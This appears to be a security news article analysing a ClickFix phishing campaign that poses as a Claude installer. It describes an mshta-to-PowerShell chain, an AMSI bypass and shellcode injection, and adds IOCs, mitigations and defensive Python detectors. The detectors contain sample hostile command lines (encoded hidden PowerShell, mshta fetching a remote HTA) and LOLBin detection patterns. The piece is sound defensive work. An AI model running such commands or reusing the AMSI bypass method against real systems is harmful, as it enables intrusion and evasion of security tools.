A sophisticated ClickFix phishing campaign is masquerading as a legitimate installer for Anthropic’s Claude AI assistant, deploying multi-layered PowerShell payloads and AMSI bypass techniques to compromise enterprise targets in the European Union and the United States.
ClickFix Phishing Campaign
ClickFix attacks are a well-documented social engineering tactic in which threat actors manipulate users into executing malicious commands, often by presenting fake error dialogs or software installation prompts.
What makes this latest campaign notable is its deceptive use of Claude, Anthropic’s widely recognized AI platform, as a lure to lower user suspicion during initial delivery.
The Security Operations Center (SOC) first detected suspicious activity on April 9, 2026, when mshta.exe was executed on a customer endpoint via the Windows Run utility.
The malicious command pointed to download-version[.]1-5-8[.]com/claude.msixbundle, a URL crafted to impersonate an MSIX application bundle associated with the Claude AI tool. At the time of discovery, the campaign had minimal visibility on threat intelligence platforms such as VirusTotal, indicating it was a new, actively evolving operation.
Multi-Stage Payload Delivery Chain
The campaign stands out for its multi-layered, evasion-heavy delivery architecture, leveraging several MITRE ATT&CK techniques in sequence to avoid detection at each stage.
Stage 1 – Fake MSIX Bundle via mshta:
The initial payload (claude.msixbundle, SHA-256: 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97) presents a misleading file header with a PK signature, suggesting it is a legitimate ZIP archive.
Buried within is an embedded HTML Application (HTA) file containing obfuscated Visual Basic Script. This technique aligns with MITRE ATT&CK T1218.005 (System Binary Proxy Execution: Mshta), where attackers exploit trusted Windows binaries to execute malicious payloads without triggering standard security controls.
Stage 2 – VBScript Deobfuscation and PowerShell Execution:
The VBS code within the HTA file runs a deobfuscation routine that reconstructs commands dynamically before invoking ShellExec to launch a heavily encoded PowerShell command via cmd.exe.
The command employs environment variable manipulation (set x=pow&&set y=ershell) to further frustrate signature-based detection engines. This corresponds to T1027.010 (Command Obfuscation) and T1059.001 (PowerShell) in the ATT&CK framework.
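The environment-variable split described above (`set x=pow&&set y=ershell`, later joined as `%x%%y%`) defeats a plain string match for "powershell" on the raw command line. The following is an added example, written for this page and not code from the article or from Rapid7, that normalizes a cmd.exe command line the way cmd itself would (dropping caret escapes and expanding variables the line defines) and flags the case where a script host only becomes visible after normalization. The sample command lines, the `LOLBINS` list and the function names are constructed for the example; the `call` in the sample is the usual way such lines force a second expansion pass.

```python
import re

# Windows script hosts and proxy-execution binaries worth flagging when their
# name appears only after de-obfuscation (list constructed for this example).
LOLBINS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32", "regsvr32")

# 'set NAME=VALUE' assignments chained with && inside a cmd.exe line.
SET_RE = re.compile(r'\bset\s+([A-Za-z_][A-Za-z0-9_]*)=([^&"]*)', re.IGNORECASE)
# %NAME% references that cmd.exe expands (a 'call' forces a second expansion pass).
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")


def normalize_cmdline(cmdline: str) -> str:
    """Return the command line as cmd.exe would see it after undoing two common
    tricks: caret escapes (po^wer^shell) and variable splitting (set x=pow&&...%x%%y%)."""
    # A bare caret is cmd.exe's escape character and is dropped before execution.
    text = cmdline.replace("^", "")
    # Collect every variable the line defines before it is referenced.
    env = {name.lower(): value for name, value in SET_RE.findall(text)}

    def expand(match):
        # Unknown variables are left untouched so nothing is silently hidden.
        return env.get(match.group(1).lower(), match.group(0))

    return VAR_RE.sub(expand, text)


def analyze_cmdline(cmdline: str) -> dict:
    """Flag a command line whose LOLBin name only appears after normalization."""
    raw_hits = sorted(b for b in LOLBINS if b in cmdline.lower())
    normalized = normalize_cmdline(cmdline)
    norm_hits = sorted(b for b in LOLBINS if b in normalized.lower())
    return {
        "normalized": normalized,
        "lolbins": norm_hits,
        # True when obfuscation was hiding the binary name from a plain string match.
        "obfuscated": bool(norm_hits) and norm_hits != raw_hits,
    }


# Constructed samples in the style the article describes; these are not the
# campaign's actual command lines.
SAMPLE_ENV_SPLIT = 'cmd /c "set x=pow&&set y=ershell&&call %x%%y% -nop -w hidden -enc QQBCAEMA"'
SAMPLE_CARETS = "cmd /c m^sh^ta https://example.invalid/stage.hta"
SAMPLE_BENIGN = "cmd /c dir C:\\Temp"

if __name__ == "__main__":
    for sample in (SAMPLE_ENV_SPLIT, SAMPLE_CARETS, SAMPLE_BENIGN):
        print(analyze_cmdline(sample))
```

Run this over process-creation telemetry (Sysmon Event ID 1 or EDR command-line fields) rather than over the raw `%x%%y%` text, and alert on `obfuscated` being true: a benign administrator rarely has a reason to assemble the name of a script host from fragments.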
Stage 3 – AMSI Bypass via .NET Marshal:
The encoded PowerShell staging payload generates an MD5 hash derived from COMPUTERNAME and USERNAME environment variables, using the first 16 characters to craft a unique URL for fetching the next-stage script.
Critically, this stage deploys a known AMSI (Antimalware Scan Interface) bypass by overwriting the amsiContext field in System.Management.Automation.AmsiUtils with the value 0x41414141 via the .NET Marshal.WriteInt32 method, effectively blinding Windows Defender and other AMSI-dependent security tools.
Stage 4 – Layered ScriptBlock Execution and Shellcode Injection:
Subsequent stages involve multiple nested PowerShell ScriptBlocks decoded from large Base64-encoded byte arrays. Each layer unpacks the next until the final block executes a process injection routine (T1055) using Windows API calls obtained via .NET interoperability. The encrypted shellcode passes through an XOR decryption routine before being injected using:
- NtAllocateVirtualMemory
- NtProtectVirtualMemory
- NtCreateThreadEx
- NtWaitForSingleObject
- NtFreeVirtualMemory
- NtClose
This fully fileless final stage is consistent with information-stealer deployment behavior, a common objective in ClickFix campaigns that have previously distributed Lumma Stealer, NetSupport RAT, and Latrodectus.
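Because Stages 3 and 4 run entirely in PowerShell memory, the most reliable place to see them is PowerShell Script Block Logging (Event ID 4104), which records the decoded text of each ScriptBlock even when AMSI has been blinded. The following is an added example, not code from the article or from Rapid7, that scans ScriptBlockText strings for the indicators the two stages leave behind: references to AmsiUtils/amsiContext, unmanaged memory writes through Marshal, the native memory and thread APIs listed above reached via .NET interop, and large Base64 blobs. The indicator labels, the severity scheme and the deliberately truncated sample log strings are constructed for the example.

```python
import re

# Each indicator is a (label, compiled regex) pair. The strings come from the
# behaviour described for Stages 3 and 4: AMSI context corruption through
# System.Management.Automation.AmsiUtils, unmanaged memory writes via Marshal,
# dynamic evaluation of decoded blocks, and large encoded byte arrays.
INDICATORS = [
    ("amsi_tamper", re.compile(r"AmsiUtils|amsiContext|amsiInitFailed|AmsiScanBuffer", re.I)),
    ("marshal_memory_write", re.compile(r"Marshal\]::(WriteInt32|WriteInt64|WriteByte|Copy)\b", re.I)),
    ("dynamic_execution", re.compile(r"\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create|FromBase64String", re.I)),
    ("large_base64_blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
]

# Native APIs the final stage calls; two or more in one block is the injection signal.
INJECTION_APIS = ("NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtCreateThreadEx",
                  "NtWaitForSingleObject", "NtFreeVirtualMemory", "NtClose",
                  "VirtualAlloc", "VirtualProtect", "CreateThread", "WriteProcessMemory")


def scan_scriptblock(text: str) -> list:
    """Return the sorted list of indicator labels present in one ScriptBlockText."""
    hits = {label for label, rx in INDICATORS if rx.search(text)}
    api_hits = [api for api in INJECTION_APIS if api in text]
    if len(api_hits) >= 2:
        hits.add("process_injection")
    return sorted(hits)


def severity(hits: list) -> str:
    """Rank a block: touching AMSI internals or injecting code is high on its own;
    a single encoding/eval indicator is only a lead worth reviewing."""
    if "amsi_tamper" in hits or "process_injection" in hits:
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


# Constructed, deliberately truncated samples (not the campaign's real scripts).
SAMPLE_BENIGN = "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"
SAMPLE_AMSI = ("...GetType('System.Management.Automation.AmsiUtils')...GetField('amsiContext'...)"
               "...[Runtime.InteropServices.Marshal]::WriteInt32(..., 0x41414141)...")
SAMPLE_INJECT = ("$b=[Convert]::FromBase64String('" + "QUFB" * 100 + "');"
                 "...NtAllocateVirtualMemory...NtProtectVirtualMemory...NtCreateThreadEx...")

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("amsi", SAMPLE_AMSI), ("inject", SAMPLE_INJECT)):
        hits = scan_scriptblock(sample)
        print(f"{name}: {severity(hits)} {hits}")
```

Feed it the ScriptBlockText field of 4104 events from the Microsoft-Windows-PowerShell/Operational log; nested layers decoded at runtime each produce their own event, so the inner blocks that carry the AMSI write and the injection calls are logged even though they never touch disk.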
How the Threat Was Detected and Contained
Detection was triggered by the rule “Attacker Technique – Remote Payload Execution via Run Utility (shell32.dll)”, which monitors the RunMRU registry key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU).
This key stores the last 26 commands executed through the Windows Run dialog, making it an invaluable forensic artifact for identifying ClickFix activity early in the kill chain. Upon alert, SOC analysts triaged the event, correlated indicators across the customer base, and initiated containment before the payload could progress to credential exfiltration.
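The RunMRU key described above is a small, well-structured artifact: one REG_SZ value per entry, named a through z and ending in the literal suffix `\1`, plus an `MRUList` value whose characters give the order, most recent first. The following is an added example, not code from the article or from Rapid7, that walks such an export in MRU order and reports the entries an analyst would want to see first: script hosts launched from the Run dialog, remote URLs, encoded PowerShell, and hidden-window switches. The sample key contents are constructed (the defanged campaign URL is reused from the IOC list); the `LOLBINS` tuple and the reason labels are assumptions made for the example.

```python
import re

# Windows Run-dialog history as it sits under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: one REG_SZ value
# per entry, named a..z, each ending in "\1", and an MRUList value that orders the
# letters most-recent first. The dictionary below is constructed, not from a real host.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://download-version[.]1-5-8[.]com/claude.msixbundle\\1",
}

# Binaries that are unusual to launch by hand from the Run dialog (constructed list).
LOLBINS = ("mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "curl")
URL_RE = re.compile(r"https?://|\[\.\]", re.I)                      # plain or defanged URL
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b", re.I)


def ordered_entries(runmru: dict) -> list:
    """Return (slot, command) pairs most-recent first, with the trailing \\1 stripped."""
    entries = []
    for letter in runmru.get("MRUList", ""):
        value = runmru.get(letter)
        if value is None:
            continue
        if value.endswith("\\1"):
            value = value[:-2]
        entries.append((letter, value))
    return entries


def classify(command: str) -> list:
    """Return the reasons a Run-dialog command deserves analyst attention."""
    reasons = []
    tokens = command.strip().split()
    first = tokens[0].lower() if tokens else ""
    first = first.rsplit("\\", 1)[-1]            # drop any path prefix
    if first.endswith(".exe"):
        first = first[:-4]
    if first in LOLBINS:
        reasons.append(f"lolbin:{first}")
    if URL_RE.search(command):
        reasons.append("remote_url")
    if ENCODED_RE.search(command):
        reasons.append("encoded_command")
    if HIDDEN_RE.search(command):
        reasons.append("hidden_or_noprofile")
    return reasons


def suspicious_entries(runmru: dict) -> list:
    """Entries, most recent first, that carry at least one reason."""
    out = []
    for letter, command in ordered_entries(runmru):
        reasons = classify(command)
        if reasons:
            out.append({"slot": letter, "command": command, "reasons": reasons})
    return out


if __name__ == "__main__":
    for entry in suspicious_entries(SAMPLE_RUNMRU):
        print(entry)
```

On a live host the same dictionary can be filled from `winreg` (or from an NTUSER.DAT hive during forensics); because the key holds only the last 26 commands, collect it early in triage before routine use of the Run dialog rotates the attacker's entry out.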
Rapid7 Detection engineers simultaneously created additional behavioral rules and performed retroactive threat hunts using the campaign’s IOCs, demonstrating how MDR operations convert single incidents into enterprise-wide protections.
Indicators of Compromise (IOCs)
Organizations should immediately search for and block the following indicators:
- Malicious File Hash: 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97 (Claudee.msixbundle)
- Domain: oakenfjrod[.]ru
- Domain: download-version[.]1-5-8[.]com
- Domain: download[.]get-version[.]com
Mitigation and Defensive Recommendations
Security teams should implement the following controls immediately:
- Monitor the RunMRU registry key for unexpected mshta, PowerShell, or cmd.exe entries passed via the Run dialog
- Block execution of mshta.exe in environments where it is not operationally required
- Enable PowerShell Constrained Language Mode and enforce Script Block Logging to capture obfuscated commands at runtime
- Audit AMSI integrity by monitoring for unauthorized writes to AmsiUtils via .NET reflection
- Deploy application allowlisting to prevent unsigned MSIX bundles from executing outside managed deployment channels.
- Reset credentials on any system where the infection chain progressed, as information stealers are the likely final payload.
- Inspect the browser clipboard content and browsing history to identify the phishing lure that delivered the initial Run command.
ClickFix phishing continues to evolve its lure themes, from fake CAPTCHA pages and Microsoft Office errors to popular AI software installers. As AI tools gain mainstream enterprise adoption, threat actors will increasingly exploit brand trust in platforms like Claude, ChatGPT, and Copilot to lower user suspicion.
MITRE ATT&CK Technique Coverage
| Technique ID | Name | Stage |
|---|---|---|
| T1218.005 | System Binary Proxy Execution: Mshta | Initial Execution |
| T1027.013 | Obfuscated Files: Encrypted/Encoded File | Payload Delivery |
| T1027.010 | Obfuscated Files: Command Obfuscation | PowerShell Stage |
| T1059.001 | Command & Scripting: PowerShell | Staging Payload |
| T1055 | Process Injection | Final Stage |
FAQ
Q1: What is a ClickFix attack, and why is it so effective?
A ClickFix attack tricks users into manually executing malicious commands by disguising them as legitimate software fixes or installations, bypassing automated security controls because the user themselves initiates the execution.
Q2: How did the ClaudeFix campaign disguise itself as legitimate software?
The campaign used a domain mimicking an official Claude AI download URL. It delivered a file with a valid ZIP header structure to impersonate a Microsoft Store MSIX bundle, deceiving both users and automated scanners.
Q3: What does AMSI bypass mean, and why is it dangerous?
AMSI (Antimalware Scan Interface) bypass turns off Windows’ built-in script inspection capability by corrupting internal memory structures, allowing subsequent malicious PowerShell code to execute without being detected by endpoint security tools.
Q4: How can organizations protect themselves from ClickFix campaigns targeting AI software lures?
Organizations should monitor the RunMRU registry key, block mshta execution, enforce PowerShell logging, deploy application allowlisting, and train users never to execute Run dialog commands prompted by websites or pop-up messages.
Site: thecybrdef.com